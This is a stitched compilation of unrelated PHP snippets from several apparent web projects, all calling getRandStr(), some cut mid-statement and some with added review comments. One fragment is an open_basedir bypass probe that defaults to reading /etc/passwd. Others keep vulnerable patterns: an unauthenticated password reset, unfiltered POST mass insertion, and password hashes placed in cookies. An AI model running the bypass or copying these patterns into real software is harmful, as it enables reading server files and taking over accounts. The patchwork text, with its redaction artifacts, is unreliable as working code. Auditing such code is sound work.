/**
 * Bulk-creates 100000 Tag records, saving each one with a random name.
 *
 * Each name comes from getRandStr(), called with a length argument
 * drawn from mt_rand(2, 5).
 */
function tag()
{
    $remaining = 100000;
    while ($remaining-- > 0) {
        $record = new Tag();
        $record->Name = getRandStr(mt_rand(2, 5));
        $record->Save();
    }
}
/**
 * Records a login (optionally) and issues the two login cookies.
 *
 * @param array $userInfo  User row; the 'id' and 'psw' entries are read.
 * @param int   $remember  Passed through to myCookie() as its third argument.
 * @param bool  $saveLogin When truthy, login counter, IP and time are updated first.
 * @return bool Always true.
 */
public function setUserLogin($userInfo = array(), $remember = 0, $saveLogin = true)
{
    if ($saveLogin) {
        // NOTE(review): ip2long() yields false for an address it cannot parse,
        // which concatenates as an empty string inside the quotes below.
        $loginIp = ip2long(getUserIp());
        $assignments = "logincount=logincount+1,loginip='" . $loginIp . "',logintime='" . TIME . "'";
        $this->update($assignments, array('id' => $userInfo['id']));
    }

    // A fresh salt per login selects the key used to encode the auth cookie.
    $saltkey = getRandStr(8);
    $authKey = admin::getAuthKey($saltkey);

    // NOTE(review): the cookie payload carries the 'psw' field of the user row.
    // If that is the stored password hash, its confidentiality rests entirely on
    // setEnocde() and the key; also confirm which cookie flags myCookie() sets.
    $payload = $userInfo['id'] . "\t" . $userInfo['psw'];
    $auth = setEnocde($payload, $authKey);

    myCookie('s_saltkey', $saltkey, $remember);
    myCookie('s_auth', $auth, $remember);

    return true;
}
/**
 * Expands the placeholders in a format string.
 *
 * {年} {月} {日} {时} {分} {秒} are replaced (case-insensitively) with the
 * current date('Y'), date('m'), date('d'), date('H'), date('i') and date('s').
 * If a {随机[N]} placeholder with N from 1 to 19 is present, every occurrence
 * of the first one matched is replaced with a single getRandStr(N) value.
 *
 * @param string $gs Format string.
 * @return string The expanded string.
 */
function getdata_yqm($gs)
{
    // Placeholder => date() format character, applied in this order.
    $dateTokens = array(
        '{年}' => 'Y',
        '{月}' => 'm',
        '{日}' => 'd',
        '{时}' => 'H',
        '{分}' => 'i',
        '{秒}' => 's',
    );

    $data = $gs;
    foreach ($dateTokens as $placeholder => $format) {
        $data = str_ireplace($placeholder, date($format), $data);
    }

    preg_match('/{随机\\[([1-9]|1[0-9])\\]}/', $data, $re);
    if (empty($re[1])) {
        return $data;
    }

    // $re[0] is the whole placeholder, $re[1] the requested length.
    return str_ireplace($re[0], getRandStr($re[1]), $data);
}
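/**
 * Generates ../config.php from the OpenShift environment variables.
 *
 * Reads the database host, user, password and gear name from the process
 * environment, generates a salt with getRandStr(20), and writes the
 * corresponding define() lines to ../config.php. If the file cannot be
 * opened, a warning is raised and nothing is written.
 */
function autoconfig()
{
    // Read the environment directly. The original built exec("echo {$VAR}")
    // commands, which interpolate undefined PHP variables (not shell
    // variables), and exec() fills its second argument with an array of
    // output lines rather than a string.
    $dbHost = (string) getenv('OPENSHIFT_MYSQL_DB_HOST');
    $dbUser = (string) getenv('OPENSHIFT_MYSQL_DB_USERNAME');
    $dbPass = (string) getenv('OPENSHIFT_MYSQL_DB_PASSWORD');
    $dbName = (string) getenv('OPENSHIFT_GEAR_NAME');

    // NOTE(review): SYSTEM_SALT is only as unpredictable as getRandStr();
    // its implementation is not visible here, confirm it uses a CSPRNG.
    $salt = getRandStr(20);

    // var_export() emits a correctly escaped single-quoted PHP literal, so a
    // quote or backslash in a value (a password, for instance) cannot break
    // out of the define() call in the generated file. Strings are joined
    // with "." because "+" is arithmetic in PHP, not concatenation.
    $text = "<?php if (!defined('SYSTEM_ROOT')) { die('Insufficient Permissions'); }\n";
    $text .= "define('DB_HOST'," . var_export($dbHost, true) . ");\n";
    $text .= "define('DB_USER'," . var_export($dbUser, true) . ");\n";
    $text .= "define('DB_PASSWD'," . var_export($dbPass, true) . ");\n";
    // The original defined DB_PASSWD a second time here with the database name.
    $text .= "define('DB_NAME'," . var_export($dbName, true) . ");\n";
    $text .= "define('DB_PREFIX','tc_');\n";
    $text .= "define('SYSTEM_SALT'," . var_export($salt, true) . ");\n";
    $text .= "//This config file was generated by the Tieba-Cloud-Sign-OpenShift-QuickStart. Please edit after you know why and how to edit this file.\n";
    $text .= "//本文件由Tieba-Cloud-Sign-OpenShift-QuickStart生成,请在明白为什么/怎么编辑之后进行编辑";

    $configfile = fopen("../config.php", "w");
    if ($configfile === false) {
        trigger_error('autoconfig: unable to open ../config.php for writing', E_USER_WARNING);
        return;
    }

    fwrite($configfile, $text);
    // The file holds database credentials; close the handle explicitly.
    fclose($configfile);
}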
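/**
 * Handles member registration.
 *
 * When the request carries a 'nickname' POST field, the submitted data is
 * checked (password confirmation, e-mail not already present in the member
 * table), a member row is inserted, its password is replaced by the value
 * from hashpassword(), and the user is redirected to Login/index. The script
 * exits at the end of that branch. Without the field, the file returned by
 * template() is included.
 */
public function reg()
{
    if (isset($_POST['nickname'])) {
        $post = $_POST;

        // NOTE(review): dump() receives the raw POST array, password fields
        // included; confirm this debug output is meant to ship.
        dump($post);

        // Strict comparison: with != two different numeric-looking strings
        // (for example "1e3" and "1000") compare as equal.
        if ($post['password'] !== $post['repassword']) {
            echo "两次密码不一至";
            exit;
        }

        if (DB::fetch_first("select * from %t where email=%s", array('member', $post['email']))) {
            exit('邮箱被占用');
        }

        $post['salt'] = getRandStr();
        $post['createtime'] = TIME;

        // NOTE(review): the whole POST array (plus salt and createtime) is
        // handed to DB::insert(). Unless DB::insert() filters keys, the client
        // chooses which member columns are set, and the password is inserted
        // as submitted until the update below replaces it. An explicit list
        // of accepted fields would close both; the table schema is not
        // visible here.
        $id = DB::insert('member', $post);
        if ($id) {
            // The hash depends on the new row id, hence insert-then-update.
            $up = array('password' => hashpassword($id, $post['password'], $post['salt']));
            DB::update('member', $up, 'id=' . $id);
            $this->redirect('Login/index');
        }
        exit;
    }

    include template();
}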
echo '<div class="alert alert-danger" role="alert">该版本涉及到数据库更改,无法自动更新,请前往论坛了解详情</div>'; } else { echo '<div class="alert alert-warning"><form action="ajax.php?mod=admin:update:updnow" method="post"><b>以下文件可以更新</b>:<br/>'; echo '<input type="hidden" name="server" value="' . intval($_GET['server']) . '">'; echo $d . $t; echo '</div><input type="submit" class="btn btn-primary" value="更新上述文件到最新正式版本"><br/><br/></form>'; } } else { echo '<div class="alert alert-success">您当前正在使用最新版本的 ' . SYSTEM_FN . ',无需更新</div>'; } } else { echo '<div class="alert alert-info">无法连接到更新服务器,请前往<a href="https://git.oschina.net/kenvix/Tieba-Cloud-Sign">OSCGit</a>自行更新</div>'; } break; case 'admin:update:updnow': $backup = SYSTEM_ROOT . '/setup/update_backup/' . time() . '-' . getRandStr(7); switch (option::get('update_server')) { case '2': $server = UPDATE_FNAME_GITHUB; break; case '3': $server = UPDATE_FNAME_CODING; break; case '4': $server = UPDATE_FNAME_GITCAFE; break; default: $server = UPDATE_FNAME_OSCGIT; break; } mkdir(SYSTEM_ROOT . '/update_cache', 0777, true);
<?php $mypath = $_SERVER['DOCUMENT_ROOT'] . '/wechat'; //用于直接部署 include_once $mypath . '/includes/magicquotes.inc.php'; include_once $mypath . '/includes/db.inc.php'; include_once $mypath . '/includes/helpers.inc.php'; session_start(); $_SESSION['signInTable'] = 'user_tbl'; if (isset($_POST['nameReady'])) { //新用户注册提交 if ($_POST['nameReady'] == 1 && $_POST['password'] == $_POST['password2']) { $token = getRandStr(); $insertId = pdoInsert($_SESSION['signInTable'], array('name' => $_POST['name'], 'password' => md5($_POST['password']), 'app_id' => $_POST['app_id'], 'app_secret' => $_POST['app_secret'], 'weixin_id' => $_POST['weixin_id'], 'token' => $token)); $initJson = '{"access_token":"null","expires_in":7200,"gettedTime":0}'; file_put_contents($GLOBALS['mypath'] . '/tokens/' . $_POST['weixin_id'] . '.token', $initJson); $defaultModule = pdoQuery('module_tbl', array('path'), null, ' limit 1'); $data = $defaultModule->fetch(); $duty = array($data['path']); // $prejson=array('dutyContent'=>$duty); $json = json_encode(array('dutyContent' => $duty)); $json = addslashes($json); $moduleId = pdoInsert('duty_tbl', array('weixin_id' => $_POST['weixin_id'], 'duty' => $json)); $_SESSION['weixinId'] = $_POST['weixin_id']; $_SESSION['login'] = true; $_SESSION['userName'] = $_POST['name']; header('location: ../admin'); exit; } else { include 'signup.html.php'; exit;
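<?php
/**
 * Password reset endpoint: generates a new token for the account matching the
 * posted e-mail address, runs the password update statement and mails the
 * token. Prints 1 when sendMail() reports success and -1 otherwise.
 *
 * Created by PhpStorm.
 * User: master
 * Date: 2016/3/2
 * Time: 20:02
 */
require 'includes/init.php';
require 'includes/lib_user.php';
require 'includes/smtp.php';
// NOTE(review): the language directory comes from the session and selects a
// file to require; confirm it is restricted to known values where it is set.
require 'lang/' . $_SESSION['lang'] . '/user.php';

$email = (isset($_POST['email']) && is_string($_POST['email'])) ? trim($_POST['email']) : '';

// The address is placed inside a quoted SQL literal below, so refuse anything
// that is not a well-formed address or that carries a quote or backslash.
// A parameterized query would be preferable; the API of $GLOBALS['db'] is not
// visible here.
if (filter_var($email, FILTER_VALIDATE_EMAIL) === false || strpbrk($email, "'\"\\") !== false) {
    echo -1;
    exit;
}

$token = getRandStr(8);
// NOTE(review): unsalted md5 is not a suitable password hash (password_hash()
// is the usual replacement). As this listing appears, $password is not
// referenced by the statement below, which carries a literal '******'.
$password = md5($token);

// NOTE(review): the stored password is replaced before the requester has
// shown control of the mailbox, so any caller can reset any account's
// password; a confirm-by-link step is the usual safeguard.
$sql = "update admin.users set password='******'where email='" . $email . "'";
$GLOBALS['db']->query($sql);

$emailBody = $_LANG['reset'] . ":{$token}<br/>" . $_LANG['modify'] . "!";
$rs = sendMail($email, $_LANG['NewPass'], $emailBody);
if ($rs) {
    echo 1;
} else {
    echo -1;
}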
<?php header('content-type: text/plain'); error_reporting(-1); ini_set('display_errors', TRUE); printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion()); printf("disable_functions: %s\n", ini_get('disable_functions')); $file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd'); $relat_file = getRelativePath(__FILE__, $file); $paths = explode('/', $file); $name = mt_rand() % 999; $exp = getRandStr(); mkdir($name); chdir($name); for ($i = 1; $i < count($paths) - 1; $i++) { mkdir($paths[$i]); chdir($paths[$i]); } mkdir($paths[$i]); for ($i -= 1; $i > 0; $i--) { chdir('..'); } $paths = explode('/', $relat_file); $j = 0; for ($i = 0; $paths[$i] == '..'; $i++) { mkdir($name); chdir($name); $j++; } for ($i = 0; $i <= $j; $i++) { chdir('..');
/**
 * Generate a token used to defend against CSRF attacks.
 *
 * The token lives in a cookie whose name is derived from AUTH_KEY and UID.
 * An existing cookie value is returned as-is; otherwise a new token is
 * created, sent as a session cookie for path '/', and returned.
 *
 * NOTE(review): setcookie() is called without the secure/httponly arguments,
 * and a value read back from $_COOKIE is returned without any format check;
 * callers that print it should escape it for the output context.
 *
 * @return string The CSRF token.
 */
public static function genToken()
{
    $cookieName = 'EM_TOKENCOOKIE_' . md5(substr(AUTH_KEY, 16, 32) . UID);

    if (!isset($_COOKIE[$cookieName])) {
        // NOTE(review): token strength depends on getRandStr(); confirm it
        // draws from a CSPRNG.
        $fresh = md5(getRandStr(16));
        setcookie($cookieName, $fresh, 0, '/');
        return $fresh;
    }

    return $_COOKIE[$cookieName];
}
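* Time: 15:23 */
header("Content-Type:text/html;charset=utf-8");
error_reporting(E_ERROR | E_WARNING);

$mypath = $_SERVER['DOCUMENT_ROOT'] . '/wechat';
include_once $mypath . '/includes/magicquotes.inc.php';
include_once $mypath . '/includes/db.inc.php';
include_once $mypath . '/includes/helpers.inc.php';
include_once $mypath . '/class/uploader.php';
session_start();

// Upload configuration: target directory, size limit and allowed extensions.
$config = array(
    "savePath" => "../user_img",
    "maxSize" => 1000,
    "allowFiles" => array(".gif", ".png", ".jpg", ".jpeg", ".bmp"),
);

// Upload directory
//$Path = "upload/";
// Backgrounds are saved in a temporary directory
//$config[ "savePath" ] = $Path;

// One random temporary name per session, reused across uploads.
if (!isset($_SESSION['temp_name'])) {
    $_SESSION['temp_name'] = getRandStr();
}

// NOTE(review): $_SESSION['weixinId'] is read without checking that a login
// exists; confirm an unauthenticated request cannot reach the uploader.
$up = new uploader($_SESSION['weixinId'], $_SESSION['temp_name'], "upfile", $config);

$type = $_REQUEST['type'];
$callback = isset($_GET['callback']) ? $_GET['callback'] : '';
$info = $up->getFileInfo();

// Hex-escape <, >, &, ' and " so that file info derived from the upload cannot
// close the <script> element or be parsed as markup in this text/html response.
$jsonFlags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

/**
 * Return data: wrapped in a callback call when a callback name was supplied,
 * plain JSON otherwise.
 */
if ($callback) {
    // The callback name is written into a <script> block, so accept only a
    // dotted JavaScript identifier; anything else would be reflected script.
    if (!is_string($callback)
        || !preg_match('/^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/D', $callback)) {
        header('HTTP/1.1 400 Bad Request');
        exit;
    }
    echo '<script>' . $callback . '(' . json_encode($info, $jsonFlags) . ')</script>';
} else {
    echo json_encode($info, $jsonFlags);
}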
</p> <p><a href="javascript:history.back(-1);">«点击返回</a></p> </div> </form> </body> </html> EOT; exit; } if (!is_writable('config.php')) { emMsg('配置文件(config.php)不可写。如果您使用的是Unix/Linux主机,请修改该文件的权限为777。如果您使用的是Windows主机,请联系管理员,将此文件设为可写'); } if (!is_writable(EMLOG_ROOT . '/content/cache')) { emMsg('缓存文件不可写。如果您使用的是Unix/Linux主机,请修改缓存目录 (content/cache) 下所有文件的权限为777。如果您使用的是Windows主机,请联系管理员,将该目录下所有文件设为可写'); } $config = "<?php\n" . "//mysql database address\n" . "define('DB_HOST','{$db_host}');" . "\n//mysql database user\n" . "define('DB_USER','{$db_user}');" . "\n//database password\n" . "define('DB_PASSWD','{$db_pw}');" . "\n//database name\n" . "define('DB_NAME','{$db_name}');" . "\n//database prefix\n" . "define('DB_PREFIX','{$db_prefix}');" . "\n//auth key\n" . "define('AUTH_KEY','" . getRandStr(32) . md5($_SERVER['HTTP_USER_AGENT']) . "');" . "\n//cookie name\n" . "define('AUTH_COOKIE_NAME','EM_AUTHCOOKIE_" . getRandStr(32, false) . "');" . "\n"; $fp = @fopen('config.php', 'w'); $fw = @fwrite($fp, $config); if (!$fw) { emMsg('配置文件(config.php)不可写。如果您使用的是Unix/Linux主机,请修改该文件的权限为777。如果您使用的是Windows主机,请联系管理员,将此文件设为可写'); } fclose($fp); //密码加密存储 $PHPASS = new PasswordHash(8, true); $adminpw = $PHPASS->HashPassword($adminpw); $dbcharset = 'utf8'; $type = 'MYISAM'; $table_charset_sql = $DB->getMysqlVersion() > '4.1' ? 'ENGINE=' . $type . ' DEFAULT CHARSET=' . $dbcharset . ';' : 'ENGINE=' . $type . ';'; if ($DB->getMysqlVersion() > '4.1') { $DB->query("ALTER DATABASE `{$db_name}` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;", true); }
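/**
 * Sends a verification code to a mobile number or e-mail address and stores
 * the code on the current user's shop row.
 *
 * Reads 'way' ('mobile' or 'email') and 'target' from POST, generates a code
 * with getRandStr(6), sends it by SMS or e-mail, writes the code into the
 * shop column named by 'way', and answers through ajaxReturn() with an
 * 'info' message.
 */
public function getVerifyCode()
{
    $this->check_login();
    $this->check_user();

    $way = filtStr($_POST['way']);
    $target = filtStr($_POST['target']);
    $db = M('shop');
    $where = 'uid=' . $this->user['id'];
    $data = array();

    if (!$target || !$way) {
        $data['info'] = '填写信息不全';
        $this->ajaxReturn($data);
        return;
    }

    // $way is used as a column name further down. Reject anything but the two
    // supported channels before any write, otherwise the client could choose
    // which shop column gets overwritten with the code.
    if ($way !== 'mobile' && $way !== 'email') {
        $data['info'] = "非法请求";
        $this->ajaxReturn($data);
        return;
    }

    // NOTE(review): confirm getRandStr() is unpredictable enough for a
    // verification code, and that requests are rate limited somewhere.
    $verifyCode = getRandStr(6);
    $save = array($way => $verifyCode);
    $msg = '您的验证码:' . $verifyCode;

    if ($way === 'mobile') {
        if (!checkIsMobile($target)) {
            $data['info'] = '手机号格式错误';
            $this->ajaxReturn($data);
            return;
        }
        // NOTE(review): $setting is never assigned in this method.
        if (sendSms($msg, $target, $setting)) {
            $db->where($where)->save($save);
            $data['info'] = '验证码发送成功';
        } else {
            $data['info'] = '验证码发送失败';
        }
    } else {
        if (!checkIsEmail($target)) {
            $data['info'] = '邮箱格式错误';
            $this->ajaxReturn($data);
            return;
        }
        $send_result = sp_send_email($target, "邮箱认证", $msg);
        if ($send_result['error']) {
            $data['info'] = '验证码发送失败';
        } else {
            $data['info'] = '验证码发送成功';
        }
    }

    // As in the original, the code is stored whether or not sending succeeded;
    // $way is now known to be 'mobile' or 'email'.
    M('shop')->where('uid=' . $this->user['id'])->setField($way, $verifyCode);
    $this->ajaxReturn($data);
}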
/**
 * Returns the salt kept in the session, creating it on first use.
 *
 * A truthy session("salt") value is returned unchanged. Otherwise a new value
 * is produced by getRandStr(C("SALT_LENGTH")), stored via session("salt", ...)
 * and returned.
 *
 * @return mixed The session salt.
 */
function getSalt()
{
    $cached = session("salt");
    if ($cached) {
        return $cached;
    }

    $fresh = getRandStr(C("SALT_LENGTH"));
    session("salt", $fresh);

    return $fresh;
}
include 'view/order_inf.html.php'; } else { header('location:controller.php?editAddress=1&from=' . $to); } exit; } if (isset($_GET['pay_order'])) { $orderId = $_GET['order_id']; $orderStu = $_GET['order_stu']; include 'view/order_inf.html.php'; exit; } if (isset($_GET['preOrderOK'])) { if (isset($_SESSION['userKey']['package'])) { // mylog($_SESSION['userKey']['package']); $preSign = array('appId' => APP_ID, 'timeStamp' => time(), 'nonceStr' => getRandStr(32), 'package' => $_SESSION['userKey']['package'], 'signType' => 'MD5'); $sign = makeSign($preSign, KEY); $preSign['paySign'] = $sign; // mylog('jsAPiPry:'.toXml($preSign)); $orderId = (include 'view/wxpay.html.php'); } else { header('location:index.php'); } exit; } if (isset($_GET['review'])) { // mylog('haha'); $reviewedQuery = pdoQuery('review_tbl', array('d_id'), array('order_id' => $_GET['order_id']), null); foreach ($reviewedQuery as $row) { $reviewed[] = $row['d_id']; }
<?php include_once '../includePackage.php'; include_once $GLOBALS['mypath'] . '/wechat/interfaceHandler.php'; session_start(); //include 'view/wxpay.html.php'; //mylog('reach'); if (isset($_POST['prePay'])) { // mylog(getArrayInf($_SERVER)); $query = pdoQuery('order_tbl', null, array('id' => $_POST['order_id'], 'stu' => '0'), ' limit 1'); if ($inf = $query->fetch()) { if (0 == $inf['stu']) { $date = array(); $date['appid'] = APP_ID; $date['mch_id'] = MCH_ID; $date['nonce_str'] = getRandStr(32); $date['body'] = 'gshopPay'; $date['spbill_create_ip'] = $_SERVER['REMOTE_ADDR']; $date['out_trade_no'] = $_POST['order_id']; $date['total_fee'] = $inf['total_fee'] * 100; $date['notify_url'] = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; $date['trade_type'] = 'JSAPI'; $date['openid'] = $inf['c_id']; $sign = makeSign($date, KEY); $date['sign'] = $sign; $xml = toXml($date); $handler = new interfaceHandler(WEIXIN_ID); $data = $handler->postByCurl('https://api.mch.weixin.qq.com/pay/unifiedorder', $xml); // mylog('prePayInf:' . $data); $dataArray = xmlToArray($data); $dataJson = json_encode($dataArray, JSON_UNESCAPED_UNICODE);
} //进行注册 $result = register_system($guardian, $_POST['school_code'], $_POST['regCode'], $_POST['password']); if ($result["error"] != 0) { die($result["msg"]); } ecs_header("Location: login.php?act=signin&username="******"guardian_phone"] . "&password="******"&status=guardian\n"); exit; } elseif ($_REQUEST['act'] == 'forgetPwd') { $status = !empty($_REQUEST['status']) ? trim($_REQUEST['status']) : ""; $phone = !empty($_REQUEST['phone']) ? trim($_REQUEST['phone']) : ""; if (!$status || !$phone) { make_json_error("输入条件错误!"); exit; } $password = getRandStr(6); //如果是家长 if ($status == 'guardian') { //扫描所有数据库 $guardian = getGuardianByUsername($phone); if ($guardian) { $res = forgetPwd_changePwd_guardian($guardian, $guardian["school_code"], $password); make_json($res); exit; } else { make_json_error("根据您输入的电话号码" . $phone . "找不到绑定的账户!"); exit; } } else { if ($status == 'admin') { $admin = getAdminByPhone($phone);
<?php
// Settings page fragment for the dl_invite table: handles the ?ok, ?update and
// ?delete query flags, then starts rendering the page.

// Refuse direct access: SYSTEM_ROOT must already be defined.
if (!defined('SYSTEM_ROOT')) {
    die('Insufficient Permissions');
}

// Success banner shown after the redirects below.
if (isset($_GET['ok'])) {
    echo '<div class="alert alert-success">操作成功</div>';
}

// ?update: append 100 new invite codes after the current highest id.
// NOTE(review): both ?update and ?delete change data on a plain GET request
// and no anti-CSRF token is checked in this fragment; confirm the including
// page enforces one.
if (isset($_GET['update'])) {
    global $m;
    $result = $m->fetch_array($m->query("select max(id) as id from `" . DB_NAME . "`.`" . DB_PREFIX . "dl_invite`"));
    $row = $result['id'];
    // Id range for the new rows: max(id)+1 through max(id)+100.
    $zg = $row + 1;
    $zg2 = $row + 100;
    for ($i = $zg; $i <= $zg2; $i++) {
        // NOTE(review): invite codes are only as unguessable as getRandStr(); confirm its source of randomness.
        $yqm = getRandStr(18);
        // Values are concatenated into the statement; both come from this script, not from the request.
        $m->query('INSERT INTO `' . DB_NAME . '`.`' . DB_PREFIX . 'dl_invite` (`id`, `code`) VALUES (\'' . $i . '\', \'' . $yqm . '\');');
    }
    ReDirect(SYSTEM_URL . 'index.php?mod=admin:setplug&plug=dl_invite&ok');
}

// ?delete: remove every invite code.
if (isset($_GET['delete'])) {
    global $m;
    $m->query("truncate table `" . DB_NAME . "`.`" . DB_PREFIX . "dl_invite`");
    ReDirect(SYSTEM_URL . 'index.php?mod=admin:setplug&plug=dl_invite&ok');
}
?> <h3>多邀请码设置</h3> </br></br></br> <?php
global $m;
$cont = '';
<head> <meta charset="utf-8"> <title>设置头像</title> <?php include 'sysapp/global_css.php'; ?> <link rel="stylesheet" href="../../img/ui/sys.css"> <script> function avatar_success(){ window.parent.HROS.navbar.getAvatar(); alert('头像保存成功'); location.reload(); } </script> </head> <body> <div style="width:530px;margin:0 auto"> <embed src="../../libs/avatar_face/face.swf" quality="high" wmode="opaque" FlashVars="defaultImg=<?php echo $avatar; ?> ?id=<?php echo getRandStr(10); ?> " pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="530" height="480"></embed> </div> <?php include 'sysapp/global_js.php'; ?> </body> </html>
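/**
 * Stores a value generated by getRandStr(10) under the 'salt' option.
 */
function callback_init()
{
    // The option name is quoted: the bare word `salt` is an undefined-constant
    // lookup, which older PHP versions silently treated as the string 'salt'
    // (with a warning) and PHP 8 rejects with an Error.
    // NOTE(review): a salt is only as unpredictable as getRandStr(); confirm
    // its source of randomness.
    option::add('salt', getRandStr(10));
}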